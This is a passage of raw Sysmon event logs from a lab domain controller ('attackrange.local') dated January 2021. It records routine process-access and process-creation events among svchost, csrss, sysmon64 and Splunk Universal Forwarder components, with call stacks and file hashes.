10341000x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-43A9-6000-FE00-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43A9-6000-FE00-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-43A9-6000-FE00-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43AA-6000-0001-000000009A01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-43AA-6000-0001-000000009A01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.971{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43AA-6000-0001-000000009A01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.972{08A6967A-43AA-6000-0001-000000009A01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.548{08A6967A-43AA-6000-FF00-000000009A01}40044704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43AA-6000-FF00-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 